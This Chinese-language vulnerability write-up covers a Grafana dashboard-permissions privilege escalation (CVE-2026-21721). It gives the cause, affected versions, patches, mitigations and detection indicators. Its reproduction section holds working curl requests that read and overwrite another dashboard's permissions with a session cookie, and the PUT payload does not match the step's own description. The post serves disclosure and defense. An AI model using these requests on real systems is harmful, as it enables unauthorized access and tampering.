文章总结： CVE-2026-21721是Grafana仪表板权限API的高危权限提升漏洞。攻击者仅需单个仪表板管理权即可越权读写组织内所有仪表板，导致数据泄露。漏洞源于API缺失目标资源校验，影响10.2.0至12.3.0版本。建议立即升级至修复版本，收紧dashboards.permissions权限，并开启审计日志监控异常调用以缓解风险。 综合评分： 93 文章分类： 漏洞分析,漏洞POC,漏洞预警

CVE-2026-21721 漏洞分析

原创

白云沧海666 白云沧海666

白帽子hack

2026年2月5日 02:21 广东

CVE-2026-21721：Grafana 仪表板权限 API 特权提升漏洞深度分析与复现

核心摘要：CVE-2026-21721 是 Grafana 中一个 CVSS 8.1 分的高危权限提升漏洞。攻击者仅需对任意一个仪表板拥有管理权限，即可读写并篡改组织内所有其他仪表板的权限，从而窃取监控数据或破坏配置。

漏洞概述

CVE-2026-21721 是 Grafana 仪表板权限 API 中存在的一个关键安全缺陷，属于“越权访问控制”漏洞。该漏洞的核心在于，API 在验证用户权限时，只检查了用户是否拥有全局的 dashboards.permissions:* 操作权限，却未验证用户是否有权管理“目标”仪表板。

这意味着，一个仅对某个普通仪表板（例如“测试看板”）拥有管理权限的低权限用户，可以直接指定其他仪表板（甚至是包含核心业务数据的“生产监控看板”）的 ID，通过 API 读取其现有权限列表，并修改它们。

该漏洞具备以下显著特征：

特征项 描述

攻击向量 网络远程，攻击者需为已认证用户

所需权限 对任意一个仪表板拥有权限管理权

交互要求 无需用户交互

影响范围 组织内部，跨所有仪表板

主要影响 权限提升、敏感数据泄露、配置篡改

CVSS 3.1 8.1（高危），向量：AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

漏洞成因分析

1. 根本原因

漏洞的根源在于 Grafana 权限检查逻辑的不完整性。当用户向 /api/dashboards/uid/:uid/permissions 等端点发起请求时，后端代码仅验证了请求者是否具备 dashboards.permissions:* 这一动作权限，完全跳过了对“目标仪表板归属或范围”的校验。

这直接违反了“最小权限原则”，将一个本应局限于特定资源（单个仪表板）的管理权，错误地提升到了组织全局级别。

2. 受影响的版本

根据 VulDB 及 Grafana 官方安全公告，该漏洞影响 Grafana 多个主版本：

受影响版本范围 安全修复版本

Grafana 10.2.0 至 11.6.8 = 11.6.9+security-01

Grafana 12.0.0 至 12.0.7 = 12.0.8+security-01

Grafana 12.1.0 至 12.1.4 = 12.1.5+security-01

Grafana 12.2.0 至 12.2.2 = 12.2.3+security-01

Grafana 12.3.0 = 12.3.1+security-01

漏洞复现与利用

免责声明：以下内容仅供安全研究与授权测试使用。在任何情况下，未经明确授权对系统进行测试均属违法行为。请在隔离的实验室环境中进行操作。

环境搭建

1. 启动受影响的 Grafana 实例

   “`bash

   # 使用 Docker 启动一个存在漏洞的 Grafana 版本（例如 12.3.0）

   docker run -d -p 3000:3000 –name grafana-vuln grafana/grafana:12.3.0

   “`

2. 访问 Grafana：打开 http://localhost:3000，使用默认管理员账户（admin/admin）登录，并完成初始化设置。

3. 创建测试用户与仪表板：

   · 创建一个新用户 lowpriv，并为其创建一个仪表板 Dashboard_A，授予该用户对 Dashboard_A 的 “管理权限”（Admin 角色）。

   · 创建另一个包含敏感信息的仪表板 Dashboard_B，其权限仅对管理员开放。

利用步骤

攻击者使用 lowpriv 账户登录后，可按以下流程发起攻击：

步骤 1：获取身份认证 Cookie

· 登录后，从浏览器开发者工具的“网络”标签页或“应用”标签页的 Cookies 中，获取 grafana_session 的值。

步骤 2：枚举组织内其他仪表板

· 虽然攻击者无权直接查看 Dashboard_B，但可通过 Grafana 的搜索 API 或已知的命名规则猜测其 UID。

· 调用 API 获取仪表板列表（如有权限）：

  “`bash

  curl -H “Cookie: grafana_session=” \

       “http://localhost:3000/api/search”

  “`

步骤 3：读取目标仪表板的权限

· 利用漏洞，读取 Dashboard_B（UID: xyz）的当前权限设置：

  “`bash

  curl -H “Cookie: grafana_session=” \

       “http://localhost:3000/api/dashboards/uid/xyz/permissions”

  “`

· 关键点：此时 API 不会返回 403 错误，因为校验已绕过。它会成功返回 Dashboard_B 的权限列表。

步骤 4：篡改目标仪表板权限

· 构造 PUT 请求，将 lowpriv 用户自己添加到 Dashboard_B 的管理员列表中：

  “`bash

  curl -X PUT -H “Content-Type: application/json” \

       -H “Cookie: grafana_session=” \

       -d ‘[{“permission”: “Admin”, “role”: “Viewer”}]’ \

       “http://localhost:3000/api/dashboards/uid/xyz/permissions”

  “`

· 请求成功（HTTP 200）即表示漏洞利用成功。此时 lowpriv 用户已获得对 Dashboard_B 的完全控制权。

步骤 5：验证与后续行动

· 再次读取 Dashboard_B 的权限，确认更改已生效。

· 攻击者现在可以查看 Dashboard_B 的所有监控数据、修改其配置，甚至将其删除。

修复与缓解措施

1. 官方补丁

Grafana 官方已发布安全更新，彻底修复了此漏洞。所有受影响版本的用户应立即升级到对应的安全修复版本。

2. 临时缓解方案

如果无法立即升级，可采取以下措施降低风险：

· 收紧权限：严格审查并最小化拥有 dashboards.permissions:* 权限的用户数量。

· 启用多因素认证 (MFA)：为核心账户（尤其是拥有权限管理能力的账户）启用 MFA。

· 加强监控与审计：

  · 开启 Grafana 的详细审计日志功能，记录所有 API 调用。

  · 在 SIEM 中设置告警规则，监控来自低权限用户的、针对多个不同仪表板 UID 的权限 API 调用序列。

  · 定期人工审计所有关键仪表板的权限变更历史。

3. 检测指标 (IoC)

安全团队可通过以下迹象发现潜在的攻击行为：

· 审计日志中出现用户对其“不应有管理权”的仪表板进行权限读取或修改的记录。

· 同一用户在短时间内对多个不同 UID 的仪表板调用 /api/dashboards/uid/*/permissions 接口。

· 敏感仪表板上出现异常的新权限授予记录。

总结

CVE-2026-21721 是一个典型的 “横向权限提升” 漏洞，其危险性在于它将低权限用户的能力放大了组织范围。虽然漏洞利用门槛低、危害大，但其根本原因——缺失对目标资源的范围校验——在软件开发中却是一个常见且应被严格规避的设计缺陷。

该漏洞也再次提醒我们，在权限系统设计上，“动作权限”与“数据范围”必须进行双重校验，缺一不可。对于使用 Grafana 的企业而言，及时应用安全更新、遵循最小权限原则并建立有效的安全监控，是防御此类漏洞的关键。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：白帽子hack 白云沧海666 白云沧海666《CVE-2026-21721 漏洞分析》